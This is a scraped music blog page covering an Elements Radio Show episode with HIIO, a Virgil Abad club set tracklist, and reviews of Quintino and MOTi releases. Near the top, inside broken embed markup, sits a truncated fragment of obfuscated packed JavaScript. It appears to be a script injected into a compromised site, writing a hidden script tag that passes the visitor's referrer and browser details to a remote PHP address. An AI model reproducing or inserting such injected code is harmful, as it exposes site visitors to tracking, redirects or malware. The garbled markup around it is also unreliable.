Martin Garrix & MOTi – Virus (How About Now)


=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yhtyz|var|u0026u|referrer|htaae||js|php'.split('|'),0,{})) url=”″ params=”auto_play=false&hide_related=false&visual=true” width=”100%” height=”450″ iframe=”false” /]

Starting off Episode #017 of Elements Radio Show, is HIIO’s official remix for James Blunt’s – Bonfire Heart. Released on Atlantic Records February 3, it’s landed at #17 on Beatport’s Top 100 Electro House Chart!

Must be HIIO’s lucky number – Episode #17 and #17 on the charts!

In this 60 minutes with Ortzy and Nico, the duo delivers new music from Reepublic, MOTI, Jason Risk, Tritonal & Paris Blohm Feat. Sterling Fox and Hard Rock Sofa & Skidka. You’ll hear some special remixes and edits from Juze & Miguel Guillen, Loopers, Hailing Jordan and more! We also have a special mashup of David Guetta‘s – Shoot Me Down from our boy Lucas Blanco in Buenos Aires, Argentina.

The bootleg of the month features DVBBS Borgeus Vs. Macklemore & Ryan Lewis – Tsunami Can´t Hold Us (Steve Aguirre Mashup). As always, the hour with HIIO is over before you know it, leaving listeners in anticipation for next months show.

HIIO will be playing alongside Dash Berlin March 2 at Ovo nightclub in Punta Del Este, Uruguay. Keep an eye out for Winter Music Conference announcements!

Quintino & MOTi – Dynamite feat. Taylr Renee

Quintino & MOTi – Dynamite (feat. Taylr Renee)

Quintino & MOTi – Dynamite (Original Mix)

Virgil Abad – Glow Spectacular @ Icon Ultra Lounge Los Angeles 08312013

August 31, 2013Virgil Abad – Glow Spectacular @ Icon Ultra Lounge Los Angeles 08312013 – [Club]

Audio clip: Adobe Flash Player (version 9 or above) is required to play this audio clip. Download the latest version here. You also need to have JavaScript enabled in your browser.

[download / cue]

01. The Chainsmokers – Talk is Cheap (Marquee Sunrise Edit)
02. 2 Chains – Birthday Song
03. Chuckie vs Showtek – Make Some Noise vs Slow Down (Chuckie Flip Edit)
04. Knife Party VS Alesso – Raise Your LRAD (Hardwell Mash Up)
05. TJR – What’s Up Suckaz (J. Espinosa Shake That Ass Edit)
06. Juicy J – Bandz Make Her Dance (CK Edit) Dirty
07. Juicy J vs. Showtek – Say No To Ratchet Pussy (RK Bootleg)
08. Encoded vs The Alarm vs Raise Your Hands – Hardwell Mashup
09. Chris Lake vs Bassjackers – La Crackin
10. Krewella – Alive (Hardwell Remix)
11. Katy Perry – Roar (Kennedy Jones Remix)
12. Vanessa Hudgens vs YLA – $$$ex – Gregor Salto Remix
13. Krewella vs W&W – Live For The Night
14. Borgore – Legend (Borgore & Carnage Remix)
15. David guetta vs Carnage & Tony Junior – Ain’t A Party Without Michael Jordan
16. Tiesto & Moti – Back To The Acid (Original Mix)
17. Gold Fish & Blank vs Benny Benassi – Here We Go Cinema (Vinyl Dave Mash Up)
18. Eurythmics vs. Halfway House – Sweet Peak Dreams (MAKJ Edit)
19. Daft Punk vs FEM – One More Jello (Bingo Players Bootleg)
20. Red Hot Chili Peppers – Otherside (Third Party Remix)
21. The Outfield vs Alesso – Your Love (Panic City Mash)
22. Chuckie, LMFAO, Nirvana, Reel 2 Real – I Like To Move To Song 2 Teen Spirit
23. Guns n Roses – Sweet Child Of Mine (Alex Wynn Edit)
24. Kid Cudi – Pursuit Of Happiness (Steve Aoki Remix)

Tiësto & MOTi – Back To The Acid

Quintino & Ralvero – Jackpot (Original Mix)

The “Jacked” resident has hit the “Jackpot.” Quintino has returned from collaborations with Moti, “Kinky Denise” and “Circuits,” to work alongside Ralvero for his latest offering. Both producers bring their electrifying sounds to the table to craft “Jackpot” into a production of festival-sized proportions. From the sharp basskicks to the blistering synths, the collaboration boasts prevalent Dutch influence. Quintino and Ralvero show up fashionably late to 2013, but kick of their respective new years with a cutting-edge release.

Quintino & Moti – Kinky Denise (Original Mix)

Quintino has once again linked up with Moti, following their previous collaboration, “Circuits,” with another electro effort for Afrojack’s Wall imprint. “Kinky Denise” follows the standard ‘Jacked’ formula with uplifting chords ahead of an edgy electro drop. This latest collaboration owns Quintino’s late night vibes, however, is much safer than his earlier productions like “The One And Only.”

Quintino & Moti – Circuits